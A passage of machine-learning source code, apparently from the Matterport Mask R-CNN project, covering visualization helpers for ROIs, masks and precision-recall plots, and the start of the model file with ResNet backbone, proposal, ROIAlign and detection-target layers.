masked_image = image.copy() # Pick random anchors in case there are too many. ids = np.arange(rois.shape[0], dtype=np.int32) ids = np.random.choice( ids, limit, replace=False) if ids.shape[0] > limit else ids fig, ax = plt.subplots(1, figsize=(12, 12)) if rois.shape[0] > limit: plt.title("Showing {} random ROIs out of {}".format( len(ids), rois.shape[0])) else: plt.title("{} ROIs".format(len(ids))) # Show area outside image boundaries. ax.set_ylim(image.shape[0] + 20, -20) ax.set_xlim(-50, image.shape[1] + 20) ax.axis('off') for i, id in enumerate(ids): color = np.random.rand(3) class_id = class_ids[id] # ROI y1, x1, y2, x2 = rois[id] p = patches.Rectangle((x1, y1), x2 - x1, y2 - y1, linewidth=2, edgecolor=color if class_id else "gray", facecolor='none', linestyle="dashed") ax.add_patch(p) # Refined ROI if class_id: ry1, rx1, ry2, rx2 = refined_rois[id] p = patches.Rectangle((rx1, ry1), rx2 - rx1, ry2 - ry1, linewidth=2, edgecolor=color, facecolor='none') ax.add_patch(p) # Connect the top-left corners of the anchor and proposal for easy visualization ax.add_line(lines.Line2D([x1, rx1], [y1, ry1], color=color)) # Label label = class_names[class_id] ax.text(rx1, ry1 + 8, "{}".format(label), color='w', size=11, backgroundcolor="none") # Mask m = utils.unmold_mask(mask[id], rois[id] [:4].astype(np.int32), image.shape) masked_image = apply_mask(masked_image, m, color) ax.imshow(masked_image) # Print stats print("Positive ROIs: ", class_ids[class_ids > 0].shape[0]) print("Negative ROIs: ", class_ids[class_ids == 0].shape[0]) print("Positive Ratio: {:.2f}".format( class_ids[class_ids > 0].shape[0] / class_ids.shape[0])) # TODO: Replace with matplotlib equivalent? def draw_box(image, box, color): """Draw 3-pixel width bounding boxes on the given image array. color: list of 3 int values for RGB. """ y1, x1, y2, x2 = box image[y1:y1 + 2, x1:x2] = color image[y2:y2 + 2, x1:x2] = color image[y1:y2, x1:x1 + 2] = color image[y1:y2, x2:x2 + 2] = color return image def display_top_masks(image, mask, class_ids, class_names, limit=4): """Display the given image and the top few class masks.""" to_display = [] titles = [] to_display.append(image) titles.append("H x W={}x{}".format(image.shape[0], image.shape[1])) # Pick top prominent classes in this image unique_class_ids = np.unique(class_ids) mask_area = [np.sum(mask[:, :, np.where(class_ids == i)[0]]) for i in unique_class_ids] top_ids = [v[0] for v in sorted(zip(unique_class_ids, mask_area), key=lambda r: r[1], reverse=True) if v[1] > 0] # Generate images and titles for i in range(limit): class_id = top_ids[i] if i < len(top_ids) else -1 # Pull masks of instances belonging to the same class. m = mask[:, :, np.where(class_ids == class_id)[0]] m = np.sum(m * np.arange(1, m.shape[-1] + 1), -1) to_display.append(m) titles.append(class_names[class_id] if class_id != -1 else "-") display_images(to_display, titles=titles, cols=limit + 1, cmap="Blues_r") def plot_precision_recall(AP, precisions, recalls): """Draw the precision-recall curve. AP: Average precision at IoU >= 0.5 precisions: list of precision values recalls: list of recall values """ # Plot the Precision-Recall curve _, ax = plt.subplots(1) ax.set_title("Precision-Recall Curve. AP@50 = {:.3f}".format(AP)) ax.set_ylim(0, 1.1) ax.set_xlim(0, 1.1) _ = ax.plot(recalls, precisions) def plot_overlaps(gt_class_ids, pred_class_ids, pred_scores, overlaps, class_names, threshold=0.5): """Draw a grid showing how ground truth objects are classified. gt_class_ids: [N] int. Ground truth class IDs pred_class_id: [N] int. Predicted class IDs pred_scores: [N] float. The probability scores of predicted classes overlaps: [pred_boxes, gt_boxes] IoU overlaps of predictions and GT boxes. class_names: list of all class names in the dataset threshold: Float. The prediction probability required to predict a class """ gt_class_ids = gt_class_ids[gt_class_ids != 0] pred_class_ids = pred_class_ids[pred_class_ids != 0] plt.figure(figsize=(12, 10)) plt.imshow(overlaps, interpolation='nearest', cmap=plt.cm.Blues) plt.yticks(np.arange(len(pred_class_ids)), ["{} ({:.2f})".format(class_names[int(id)], pred_scores[i]) for i, id in enumerate(pred_class_ids)]) plt.xticks(np.arange(len(gt_class_ids)), [class_names[int(id)] for id in gt_class_ids], rotation=90) thresh = overlaps.max() / 2. for i, j in itertools.product(range(overlaps.shape[0]), range(overlaps.shape[1])): text = "" if overlaps[i, j] > threshold: text = "match" if gt_class_ids[j] == pred_class_ids[i] else "wrong" color = ("white" if overlaps[i, j] > thresh else "black" if overlaps[i, j] > 0 else "grey") plt.text(j, i, "{:.3f}\n{}".format(overlaps[i, j], text), horizontalalignment="center", verticalalignment="center", fontsize=9, color=color) plt.tight_layout() plt.xlabel("Ground Truth") plt.ylabel("Predictions") def draw_boxes(image, boxes=None, refined_boxes=None, masks=None, captions=None, visibilities=None, title="", ax=None): """Draw bounding boxes and segmentation masks with different customizations. boxes: [N, (y1, x1, y2, x2, class_id)] in image coordinates. refined_boxes: Like boxes, but draw with solid lines to show that they're the result of refining 'boxes'. masks: [N, height, width] captions: List of N titles to display on each box visibilities: (optional) List of values of 0, 1, or 2. Determine how prominent each bounding box should be. title: An optional title to show over the image ax: (optional) Matplotlib axis to draw on. """ # Number of boxes assert boxes is not None or refined_boxes is not None N = boxes.shape[0] if boxes is not None else refined_boxes.shape[0] # Matplotlib Axis if not ax: _, ax = plt.subplots(1, figsize=(12, 12)) # Generate random colors colors = random_colors(N) # Show area outside image boundaries. margin = image.shape[0] // 10 ax.set_ylim(image.shape[0] + margin, -margin) ax.set_xlim(-margin, image.shape[1] + margin) ax.axis('off') ax.set_title(title) masked_image = image.astype(np.uint32).copy() for i in range(N): # Box visibility visibility = visibilities[i] if visibilities is not None else 1 if visibility == 0: color = "gray" style = "dotted" alpha = 0.5 elif visibility == 1: color = colors[i] style = "dotted" alpha = 1 elif visibility == 2: color = colors[i] style = "solid" alpha = 1 # Boxes if boxes is not None: if not np.any(boxes[i]): # Skip this instance. Has no bbox. Likely lost in cropping. continue y1, x1, y2, x2 = boxes[i] p = patches.Rectangle((x1, y1), x2 - x1, y2 - y1, linewidth=2, alpha=alpha, linestyle=style, edgecolor=color, facecolor='none') ax.add_patch(p) # Refined boxes if refined_boxes is not None and visibility > 0: ry1, rx1, ry2, rx2 = refined_boxes[i].astype(np.int32) p = patches.Rectangle((rx1, ry1), rx2 - rx1, ry2 - ry1, linewidth=2, edgecolor=color, facecolor='none') ax.add_patch(p) # Connect the top-left corners of the anchor and proposal if boxes is not None: ax.add_line(lines.Line2D([x1, rx1], [y1, ry1], color=color)) # Captions if captions is not None: caption = captions[i] # If there are refined boxes, display captions on them if refined_boxes is not None: y1, x1, y2, x2 = ry1, rx1, ry2, rx2 ax.text(x1, y1, caption, size=11, verticalalignment='top', color='w', backgroundcolor="none", bbox={'facecolor': color, 'alpha': 0.5, 'pad': 2, 'edgecolor': 'none'}) # Masks if masks is not None: mask = masks[:, :, i] masked_image = apply_mask(masked_image, mask, color) # Mask Polygon # Pad to ensure proper polygons for masks that touch image edges. padded_mask = np.zeros( (mask.shape[0] + 2, mask.shape[1] + 2), dtype=np.uint8) padded_mask[1:-1, 1:-1] = mask contours = find_contours(padded_mask, 0.5) for verts in contours: # Subtract the padding and flip (y, x) to (x, y) verts = np.fliplr(verts) - 1 p = Polygon(verts, facecolor="none", edgecolor=color) ax.add_patch(p) ax.imshow(masked_image.astype(np.uint8)) def display_table(table): """Display values in a table format. table: an iterable of rows, and each row is an iterable of values. """ html = "" for row in table: row_html = "" for col in row: row_html += "<td>{:40}</td>".format(str(col)) html += "<tr>" + row_html + "</tr>" html = "<table>" + html + "</table>" IPython.display.display(IPython.display.HTML(html)) def display_weight_stats(model): """Scans all the weights in the model and returns a list of tuples that contain stats about each weight. """ layers = model.get_trainable_layers() table = [["WEIGHT NAME", "SHAPE", "MIN", "MAX", "STD"]] for l in layers: weight_values = l.get_weights() # list of Numpy arrays weight_tensors = l.weights # list of TF tensors for i, w in enumerate(weight_values): weight_name = weight_tensors[i].name # Detect problematic layers. Exclude biases of conv layers. alert = "" if w.min() == w.max() and not (l.__class__.__name__ == "Conv2D" and i == 1): alert += "<span style='color:red'>*** dead?</span>" if np.abs(w.min()) > 1000 or np.abs(w.max()) > 1000: alert += "<span style='color:red'>*** Overflow?</span>" # Add row table.append([ weight_name + alert, str(w.shape), "{:+9.4f}".format(w.min()), "{:+10.4f}".format(w.max()), "{:+9.4f}".format(w.std()), ]) display_table(table) File: mrcnn/model.py """ Mask R-CNN The main Mask R-CNN model implementation. Copyright (c) 2017 Matterport, Inc. Licensed under the MIT License (see LICENSE for details) Written by Waleed Abdulla """ import os import random import datetime import re import math import logging from collections import OrderedDict import multiprocessing import numpy as np import tensorflow as tf import keras import keras.backend as K import keras.layers as KL import keras.engine as KE import keras.models as KM from mrcnn import utils # Requires TensorFlow 1.3+ and Keras 2.0.8+. from distutils.version import LooseVersion assert LooseVersion(tf.__version__) >= LooseVersion("1.3") assert LooseVersion(keras.__version__) >= LooseVersion('2.0.8') ############################################################ # Utility Functions ############################################################ def log(text, array=None): """Prints a text message. And, optionally, if a Numpy array is provided it prints it's shape, min, and max values. """ if array is not None: text = text.ljust(25) text += ("shape: {:20} ".format(str(array.shape))) if array.size: text += ("min: {:10.5f} max: {:10.5f}".format(array.min(),array.max())) else: text += ("min: {:10} max: {:10}".format("","")) text += " {}".format(array.dtype) print(text) class BatchNorm(KL.BatchNormalization): """Extends the Keras BatchNormalization class to allow a central place to make changes if needed. Batch normalization has a negative effect on training if batches are small so this layer is often frozen (via setting in Config class) and functions as linear layer. """ def call(self, inputs, training=None): """ Note about training values: None: Train BN layers. This is the normal mode False: Freeze BN layers. Good when batch size is small True: (don't use). Set layer in training mode even when making inferences """ return super(self.__class__, self).call(inputs, training=training) def compute_backbone_shapes(config, image_shape): """Computes the width and height of each stage of the backbone network. Returns: [N, (height, width)]. Where N is the number of stages """ if callable(config.BACKBONE): return config.COMPUTE_BACKBONE_SHAPE(image_shape) # Currently supports ResNet only assert config.BACKBONE in ["resnet50", "resnet101"] return np.array( [[int(math.ceil(image_shape[0] / stride)), int(math.ceil(image_shape[1] / stride))] for stride in config.BACKBONE_STRIDES]) ############################################################ # Resnet Graph ############################################################ # Code adopted from: # https://github.com/fchollet/deep-learning-models/blob/master/resnet50.py def identity_block(input_tensor, kernel_size, filters, stage, block, use_bias=True, train_bn=True): """The identity_block is the block that has no conv layer at shortcut # Arguments input_tensor: input tensor kernel_size: default 3, the kernel size of middle conv layer at main path filters: list of integers, the nb_filters of 3 conv layer at main path stage: integer, current stage label, used for generating layer names block: 'a','b'..., current block label, used for generating layer names use_bias: Boolean. To use or not use a bias in conv layers. train_bn: Boolean. Train or freeze Batch Norm layers """ nb_filter1, nb_filter2, nb_filter3 = filters conv_name_base = 'res' + str(stage) + block + '_branch' bn_name_base = 'bn' + str(stage) + block + '_branch' x = KL.Conv2D(nb_filter1, (1, 1), name=conv_name_base + '2a', use_bias=use_bias)(input_tensor) x = BatchNorm(name=bn_name_base + '2a')(x, training=train_bn) x = KL.Activation('relu')(x) x = KL.Conv2D(nb_filter2, (kernel_size, kernel_size), padding='same', name=conv_name_base + '2b', use_bias=use_bias)(x) x = BatchNorm(name=bn_name_base + '2b')(x, training=train_bn) x = KL.Activation('relu')(x) x = KL.Conv2D(nb_filter3, (1, 1), name=conv_name_base + '2c', use_bias=use_bias)(x) x = BatchNorm(name=bn_name_base + '2c')(x, training=train_bn) x = KL.Add()([x, input_tensor]) x = KL.Activation('relu', name='res' + str(stage) + block + '_out')(x) return x def conv_block(input_tensor, kernel_size, filters, stage, block, strides=(2, 2), use_bias=True, train_bn=True): """conv_block is the block that has a conv layer at shortcut # Arguments input_tensor: input tensor kernel_size: default 3, the kernel size of middle conv layer at main path filters: list of integers, the nb_filters of 3 conv layer at main path stage: integer, current stage label, used for generating layer names block: 'a','b'..., current block label, used for generating layer names use_bias: Boolean. To use or not use a bias in conv layers. train_bn: Boolean. Train or freeze Batch Norm layers Note that from stage 3, the first conv layer at main path is with subsample=(2,2) And the shortcut should have subsample=(2,2) as well """ nb_filter1, nb_filter2, nb_filter3 = filters conv_name_base = 'res' + str(stage) + block + '_branch' bn_name_base = 'bn' + str(stage) + block + '_branch' x = KL.Conv2D(nb_filter1, (1, 1), strides=strides, name=conv_name_base + '2a', use_bias=use_bias)(input_tensor) x = BatchNorm(name=bn_name_base + '2a')(x, training=train_bn) x = KL.Activation('relu')(x) x = KL.Conv2D(nb_filter2, (kernel_size, kernel_size), padding='same', name=conv_name_base + '2b', use_bias=use_bias)(x) x = BatchNorm(name=bn_name_base + '2b')(x, training=train_bn) x = KL.Activation('relu')(x) x = KL.Conv2D(nb_filter3, (1, 1), name=conv_name_base + '2c', use_bias=use_bias)(x) x = BatchNorm(name=bn_name_base + '2c')(x, training=train_bn) shortcut = KL.Conv2D(nb_filter3, (1, 1), strides=strides, name=conv_name_base + '1', use_bias=use_bias)(input_tensor) shortcut = BatchNorm(name=bn_name_base + '1')(shortcut, training=train_bn) x = KL.Add()([x, shortcut]) x = KL.Activation('relu', name='res' + str(stage) + block + '_out')(x) return x def resnet_graph(input_image, architecture, stage5=False, train_bn=True): """Build a ResNet graph. architecture: Can be resnet50 or resnet101 stage5: Boolean. If False, stage5 of the network is not created train_bn: Boolean. Train or freeze Batch Norm layers """ assert architecture in ["resnet50", "resnet101"] # Stage 1 x = KL.ZeroPadding2D((3, 3))(input_image) x = KL.Conv2D(64, (7, 7), strides=(2, 2), name='conv1', use_bias=True)(x) x = BatchNorm(name='bn_conv1')(x, training=train_bn) x = KL.Activation('relu')(x) C1 = x = KL.MaxPooling2D((3, 3), strides=(2, 2), padding="same")(x) # Stage 2 x = conv_block(x, 3, [64, 64, 256], stage=2, block='a', strides=(1, 1), train_bn=train_bn) x = identity_block(x, 3, [64, 64, 256], stage=2, block='b', train_bn=train_bn) C2 = x = identity_block(x, 3, [64, 64, 256], stage=2, block='c', train_bn=train_bn) # Stage 3 x = conv_block(x, 3, [128, 128, 512], stage=3, block='a', train_bn=train_bn) x = identity_block(x, 3, [128, 128, 512], stage=3, block='b', train_bn=train_bn) x = identity_block(x, 3, [128, 128, 512], stage=3, block='c', train_bn=train_bn) C3 = x = identity_block(x, 3, [128, 128, 512], stage=3, block='d', train_bn=train_bn) # Stage 4 x = conv_block(x, 3, [256, 256, 1024], stage=4, block='a', train_bn=train_bn) block_count = {"resnet50": 5, "resnet101": 22}[architecture] for i in range(block_count): x = identity_block(x, 3, [256, 256, 1024], stage=4, block=chr(98 + i), train_bn=train_bn) C4 = x # Stage 5 if stage5: x = conv_block(x, 3, [512, 512, 2048], stage=5, block='a', train_bn=train_bn) x = identity_block(x, 3, [512, 512, 2048], stage=5, block='b', train_bn=train_bn) C5 = x = identity_block(x, 3, [512, 512, 2048], stage=5, block='c', train_bn=train_bn) else: C5 = None return [C1, C2, C3, C4, C5] ############################################################ # Proposal Layer ############################################################ def apply_box_deltas_graph(boxes, deltas): """Applies the given deltas to the given boxes. boxes: [N, (y1, x1, y2, x2)] boxes to update deltas: [N, (dy, dx, log(dh), log(dw))] refinements to apply """ # Convert to y, x, h, w height = boxes[:, 2] - boxes[:, 0] width = boxes[:, 3] - boxes[:, 1] center_y = boxes[:, 0] + 0.5 * height center_x = boxes[:, 1] + 0.5 * width # Apply deltas center_y += deltas[:, 0] * height center_x += deltas[:, 1] * width height *= tf.exp(deltas[:, 2]) width *= tf.exp(deltas[:, 3]) # Convert back to y1, x1, y2, x2 y1 = center_y - 0.5 * height x1 = center_x - 0.5 * width y2 = y1 + height x2 = x1 + width result = tf.stack([y1, x1, y2, x2], axis=1, name="apply_box_deltas_out") return result def clip_boxes_graph(boxes, window): """ boxes: [N, (y1, x1, y2, x2)] window: [4] in the form y1, x1, y2, x2 """ # Split wy1, wx1, wy2, wx2 = tf.split(window, 4) y1, x1, y2, x2 = tf.split(boxes, 4, axis=1) # Clip y1 = tf.maximum(tf.minimum(y1, wy2), wy1) x1 = tf.maximum(tf.minimum(x1, wx2), wx1) y2 = tf.maximum(tf.minimum(y2, wy2), wy1) x2 = tf.maximum(tf.minimum(x2, wx2), wx1) clipped = tf.concat([y1, x1, y2, x2], axis=1, name="clipped_boxes") clipped.set_shape((clipped.shape[0], 4)) return clipped class ProposalLayer(KE.Layer): """Receives anchor scores and selects a subset to pass as proposals to the second stage. Filtering is done based on anchor scores and non-max suppression to remove overlaps. It also applies bounding box refinement deltas to anchors. Inputs: rpn_probs: [batch, num_anchors, (bg prob, fg prob)] rpn_bbox: [batch, num_anchors, (dy, dx, log(dh), log(dw))] anchors: [batch, num_anchors, (y1, x1, y2, x2)] anchors in normalized coordinates Returns: Proposals in normalized coordinates [batch, rois, (y1, x1, y2, x2)] """ def __init__(self, proposal_count, nms_threshold, config=None, **kwargs): super(ProposalLayer, self).__init__(**kwargs) self.config = config self.proposal_count = proposal_count self.nms_threshold = nms_threshold def call(self, inputs): # Box Scores. Use the foreground class confidence. [Batch, num_rois, 1] scores = inputs[0][:, :, 1] # Box deltas [batch, num_rois, 4] deltas = inputs[1] deltas = deltas * np.reshape(self.config.RPN_BBOX_STD_DEV, [1, 1, 4]) # Anchors anchors = inputs[2] # Improve performance by trimming to top anchors by score # and doing the rest on the smaller subset. pre_nms_limit = tf.minimum(self.config.PRE_NMS_LIMIT, tf.shape(anchors)[1]) ix = tf.nn.top_k(scores, pre_nms_limit, sorted=True, name="top_anchors").indices scores = utils.batch_slice([scores, ix], lambda x, y: tf.gather(x, y), self.config.IMAGES_PER_GPU) deltas = utils.batch_slice([deltas, ix], lambda x, y: tf.gather(x, y), self.config.IMAGES_PER_GPU) pre_nms_anchors = utils.batch_slice([anchors, ix], lambda a, x: tf.gather(a, x), self.config.IMAGES_PER_GPU, names=["pre_nms_anchors"]) # Apply deltas to anchors to get refined anchors. # [batch, N, (y1, x1, y2, x2)] boxes = utils.batch_slice([pre_nms_anchors, deltas], lambda x, y: apply_box_deltas_graph(x, y), self.config.IMAGES_PER_GPU, names=["refined_anchors"]) # Clip to image boundaries. Since we're in normalized coordinates, # clip to 0..1 range. [batch, N, (y1, x1, y2, x2)] window = np.array([0, 0, 1, 1], dtype=np.float32) boxes = utils.batch_slice(boxes, lambda x: clip_boxes_graph(x, window), self.config.IMAGES_PER_GPU, names=["refined_anchors_clipped"]) # Filter out small boxes # According to Xinlei Chen's paper, this reduces detection accuracy # for small objects, so we're skipping it. # Non-max suppression def nms(boxes, scores): indices = tf.image.non_max_suppression( boxes, scores, self.proposal_count, self.nms_threshold, name="rpn_non_max_suppression") proposals = tf.gather(boxes, indices) # Pad if needed padding = tf.maximum(self.proposal_count - tf.shape(proposals)[0], 0) proposals = tf.pad(proposals, [(0, padding), (0, 0)]) return proposals proposals = utils.batch_slice([boxes, scores], nms, self.config.IMAGES_PER_GPU) return proposals def compute_output_shape(self, input_shape): return (None, self.proposal_count, 4) ############################################################ # ROIAlign Layer ############################################################ def log2_graph(x): """Implementation of Log2. TF doesn't have a native implementation.""" return tf.log(x) / tf.log(2.0) class PyramidROIAlign(KE.Layer): """Implements ROI Pooling on multiple levels of the feature pyramid. Params: - pool_shape: [pool_height, pool_width] of the output pooled regions. Usually [7, 7] Inputs: - boxes: [batch, num_boxes, (y1, x1, y2, x2)] in normalized coordinates. Possibly padded with zeros if not enough boxes to fill the array. - image_meta: [batch, (meta data)] Image details. See compose_image_meta() - feature_maps: List of feature maps from different levels of the pyramid. Each is [batch, height, width, channels] Output: Pooled regions in the shape: [batch, num_boxes, pool_height, pool_width, channels]. The width and height are those specific in the pool_shape in the layer constructor. """ def __init__(self, pool_shape, **kwargs): super(PyramidROIAlign, self).__init__(**kwargs) self.pool_shape = tuple(pool_shape) def call(self, inputs): # Crop boxes [batch, num_boxes, (y1, x1, y2, x2)] in normalized coords boxes = inputs[0] # Image meta # Holds details about the image. See compose_image_meta() image_meta = inputs[1] # Feature Maps. List of feature maps from different level of the # feature pyramid. Each is [batch, height, width, channels] feature_maps = inputs[2:] # Assign each ROI to a level in the pyramid based on the ROI area. y1, x1, y2, x2 = tf.split(boxes, 4, axis=2) h = y2 - y1 w = x2 - x1 # Use shape of first image. Images in a batch must have the same size. image_shape = parse_image_meta_graph(image_meta)['image_shape'][0] # Equation 1 in the Feature Pyramid Networks paper. Account for # the fact that our coordinates are normalized here. # e.g. a 224x224 ROI (in pixels) maps to P4 image_area = tf.cast(image_shape[0] * image_shape[1], tf.float32) roi_level = log2_graph(tf.sqrt(h * w) / (224.0 / tf.sqrt(image_area))) roi_level = tf.minimum(5, tf.maximum( 2, 4 + tf.cast(tf.round(roi_level), tf.int32))) roi_level = tf.squeeze(roi_level, 2) # Loop through levels and apply ROI pooling to each. P2 to P5. pooled = [] box_to_level = [] for i, level in enumerate(range(2, 6)): ix = tf.where(tf.equal(roi_level, level)) level_boxes = tf.gather_nd(boxes, ix) # Box indices for crop_and_resize. box_indices = tf.cast(ix[:, 0], tf.int32) # Keep track of which box is mapped to which level box_to_level.append(ix) # Stop gradient propogation to ROI proposals level_boxes = tf.stop_gradient(level_boxes) box_indices = tf.stop_gradient(box_indices) # Crop and Resize # From Mask R-CNN paper: "We sample four regular locations, so # that we can evaluate either max or average pooling. In fact, # interpolating only a single value at each bin center (without # pooling) is nearly as effective." # # Here we use the simplified approach of a single value per bin, # which is how it's done in tf.crop_and_resize() # Result: [batch * num_boxes, pool_height, pool_width, channels] pooled.append(tf.image.crop_and_resize( feature_maps[i], level_boxes, box_indices, self.pool_shape, method="bilinear")) # Pack pooled features into one tensor pooled = tf.concat(pooled, axis=0) # Pack box_to_level mapping into one array and add another # column representing the order of pooled boxes box_to_level = tf.concat(box_to_level, axis=0) box_range = tf.expand_dims(tf.range(tf.shape(box_to_level)[0]), 1) box_to_level = tf.concat([tf.cast(box_to_level, tf.int32), box_range], axis=1) # Rearrange pooled features to match the order of the original boxes # Sort box_to_level by batch then box index # TF doesn't have a way to sort by two columns, so merge them and sort. sorting_tensor = box_to_level[:, 0] * 100000 + box_to_level[:, 1] ix = tf.nn.top_k(sorting_tensor, k=tf.shape( box_to_level)[0]).indices[::-1] ix = tf.gather(box_to_level[:, 2], ix) pooled = tf.gather(pooled, ix) # Re-add the batch dimension shape = tf.concat([tf.shape(boxes)[:2], tf.shape(pooled)[1:]], axis=0) pooled = tf.reshape(pooled, shape) return pooled def compute_output_shape(self, input_shape): return input_shape[0][:2] + self.pool_shape + (input_shape[2][-1], ) ############################################################ # Detection Target Layer ############################################################ def overlaps_graph(boxes1, boxes2): """Computes IoU overlaps between two sets of boxes. boxes1, boxes2: [N, (y1, x1, y2, x2)]. """ # 1. Tile boxes2 and repeat boxes1. This allows us to compare # every boxes1 against every boxes2 without loops. # TF doesn't have an equivalent to np.repeat() so simulate it # using tf.tile() and tf.reshape. b1 = tf.reshape(tf.tile(tf.expand_dims(boxes1, 1), [1, 1, tf.shape(boxes2)[0]]), [-1, 4]) b2 = tf.tile(boxes2, [tf.shape(boxes1)[0], 1]) # 2. Compute intersections b1_y1, b1_x1, b1_y2, b1_x2 = tf.split(b1, 4, axis=1) b2_y1, b2_x1, b2_y2, b2_x2 = tf.split(b2, 4, axis=1) y1 = tf.maximum(b1_y1, b2_y1) x1 = tf.maximum(b1_x1, b2_x1) y2 = tf.minimum(b1_y2, b2_y2) x2 = tf.minimum(b1_x2, b2_x2) intersection = tf.maximum(x2 - x1, 0) * tf.maximum(y2 - y1, 0) # 3. Compute unions b1_area = (b1_y2 - b1_y1) * (b1_x2 - b1_x1) b2_area = (b2_y2 - b2_y1) * (b2_x2 - b2_x1) union = b1_area + b2_area - intersection # 4. Compute IoU and reshape to [boxes1, boxes2] iou = intersection / union overlaps = tf.reshape(iou, [tf.shape(boxes1)[0], tf.shape(boxes2)[0]]) return overlaps def detection_targets_graph(proposals, gt_class_ids, gt_boxes, gt_masks, config): """Generates detection targets for one image. Subsamples proposals and generates target class IDs, bounding box deltas, and masks for each. Inputs: proposals: [POST_NMS_ROIS_TRAINING, (y1, x1, y2, x2)] in normalized coordinates. Might be zero padded if there are not enough proposals. gt_class_ids: [MAX_GT_INSTANCES] int class IDs gt_boxes: [MAX_GT_INSTANCES, (y1, x1, y2, x2)] in normalized coordinates. gt_masks: [height, width, MAX_GT_INSTANCES] of boolean type. Returns: Target ROIs and corresponding class IDs, bounding box shifts, and masks. rois: [TRAIN_ROIS_PER_IMAGE, (y1, x1, y2, x2)] in normalized coordinates class_ids: [TRAIN_ROIS_PER_IMAGE]. Integer class IDs. Zero padded. deltas: [TRAIN_ROIS_PER_IMAGE, (dy, dx, log(dh), log(dw))] masks: [TRAIN_ROIS_PER_IMAGE, height, width]. Masks cropped to bbox boundaries and resized to neural network output size. Note: Returned arrays might be zero padded if not enough target ROIs. """ # Assertions asserts = [ tf.Assert(tf.greater(tf.shape(proposals)[0], 0), [proposals], name="roi_assertion"), ] with tf.control_dependencies(asserts): proposals = tf.identity(proposals) # Remove zero padding proposals, _ = trim_zeros_graph(proposals, name="trim_proposals") gt_boxes, non_zeros = trim_zeros_graph(gt_boxes, name="trim_gt_boxes") gt_class_ids = tf.boolean_mask(gt_class_ids, non_zeros, name="trim_gt_class_ids") gt_masks = tf.gather(gt_masks, tf.where(non_zeros)[:, 0], axis=2, name="trim_gt_masks") # Handle COCO crowds # A crowd box in COCO is a bounding box around several instances. Exclude # them from training. A crowd box is given a negative class ID. crowd_ix = tf.where(gt_class_ids < 0)[:, 0] non_crowd_ix = tf.where(gt_class_ids > 0)[:, 0] crowd_boxes = tf.gather(gt_boxes, crowd_ix) gt_class_ids = tf.gather(gt_class_ids, non_crowd_ix) gt_boxes = tf.gather(gt_boxes, non_crowd_ix) gt_masks = tf.gather(gt_masks, non_crowd_ix, axis=2) # Compute overlaps matrix [proposals, gt_boxes] overlaps = overlaps_graph(proposals, gt_boxes) # Compute overlaps with crowd boxes [proposals, crowd_boxes] crowd_overlaps = overlaps_graph(proposals, crowd_boxes) crowd_iou_max = tf.reduce_max(crowd_overlaps, axis=1) no_crowd_bool = (crowd_iou_max < 0.001) # Determine positive and negative ROIs roi_iou_max = tf.reduce_max(overlaps, axis=1) # 1. Positive ROIs are those with >= 0.5 IoU with a GT box positive_roi_bool = (roi_iou_max >= 0.5) positive_indices = tf.where(positive_roi_bool)[:, 0] # 2. Negative ROIs are those with < 0.5 with every GT box. Skip crowds. negative_indices = tf.where(tf.logical_and(roi_iou_max < 0.5, no_crowd_bool))[:, 0] # Subsample ROIs. Aim for 33% positive # Positive ROIs positive_count = int(config.TRAIN_ROIS_PER_IMAGE * config.ROI_POSITIVE_RATIO) positive_indices = tf.random_shuffle(positive_indices)[:positive_count] positive_count = tf.shape(positive_indices)[0] # Negative ROIs. Add enough to maintain positive:negative ratio. r = 1.0 / config.ROI_POSITIVE_RATIO negative_count = tf.cast(r * tf.cast(positive_count, tf.float32), tf.int32) - positive_count negative_indices = tf.random_shuffle(negative_indices)[:negative_count] # Gather selected ROIs positive_rois = tf.gather(proposals, positive_indices) negative_rois = tf.gather(proposals, negative_indices) # Assign positive ROIs to GT boxes. positive_overlaps = tf.gather(overlaps, positive_indices) roi_gt_box_assignment = tf.cond( tf.greater(tf.shape(positive_overlaps)[1], 0), true_fn = lambda: tf.argmax(positive_overlaps, axis=1), false_fn = lambda: tf.cast(tf.constant([]),tf.int64) ) roi_gt_boxes = tf.gather(gt_boxes, roi_gt_box_assignment) roi_gt_class_ids = tf.gather(gt_class_ids, roi_gt_box_assignment) # Compute bbox refinement for positive ROIs deltas = utils.box_refinement_graph(positive_rois, roi_gt_boxes) deltas /= config.BBOX_STD_DEV # Assign positive ROIs to GT masks # Permute masks to [N, height, width, 1] transposed_masks = tf.expand_dims(tf.transpose(gt_masks, [2, 0, 1]), -1) # Pick the right mask for each ROI roi_masks = tf.gather(transposed_masks, roi_gt_box_assignment) # Compute mask targets boxes = positive_rois if config.USE_MINI_MASK: # Transform ROI coordinates from normalized image space # to normalized mini-mask space. y1, x1, y2, x2 = tf.split(positive_rois, 4, axis=1) gt_y1, gt_x1, gt_y2, gt_x2 = tf.split(roi_gt_boxes, 4, axis=1) gt_h = gt_y2 - gt_y1 gt_w = gt_x2 - gt_x1 y1 = (y1 - gt_y1) / gt_h x1 = (x1 - gt_x1) / gt_w y2 = (y2 - gt_y1) / gt_h x2 = (x2 - gt_x1) / gt_w boxes = tf.concat([y1, x1, y2, x2], 1) box_ids = tf.range(0, tf.shape(roi_masks)[0]) masks = tf.image.crop_and_resize(tf.cast(roi_masks, tf.float32), boxes, box_ids, config.MASK_SHAPE) # Remove the extra dimension from masks. masks = tf.squeeze(masks, axis=3) # Threshold mask pixels at 0.5 to have GT masks be 0 or 1 to use with # binary cross entropy loss. masks = tf.round(masks) # Append negative ROIs and pad bbox deltas and masks that # are not used for negative ROIs with zeros. rois = tf.concat([positive_rois, negative_rois], axis=0) N = tf.shape(negative_rois)[0] P = tf.maximum(config.TRAIN_ROIS_PER_IMAGE - tf.shape(rois)[0], 0) rois = tf.pad(rois, [(0, P), (0, 0)]) roi_gt_boxes = tf.pad(roi_gt_boxes, [(0, N + P), (0, 0)]) roi_gt_class_ids = tf.pad(roi_gt_class_ids, [(0, N + P)]) deltas = tf.pad(deltas, [(0, N + P), (0, 0)]) masks = tf.pad(masks, [[0, N + P], (0, 0), (0, 0)]) return rois, roi_gt_class_ids, deltas, masks class DetectionTargetLayer(KE.Layer): """Subsamples proposals and generates target box refinement, class_ids, and masks for each. Inputs: proposals: [batch, N, (y1, x1, y2, x2)] in normalized coordinates. Might be zero padded if there are not enough proposals. gt_class_ids: [batch, MAX_GT_INSTANCES] Integer class IDs. gt_boxes: [batch, MAX_GT_INSTANCES, (y1, x1, y2, x2)] in normalized coordinates. gt_masks: [batch, height, width, MAX_GT_INSTANCES] of boolean type Returns: Target ROIs and corresponding class IDs, bounding box shifts, and masks. rois: [batch, TRAIN_ROIS_PER_IMAGE, (y1, x1, y2, x2)] in normalized coordinates 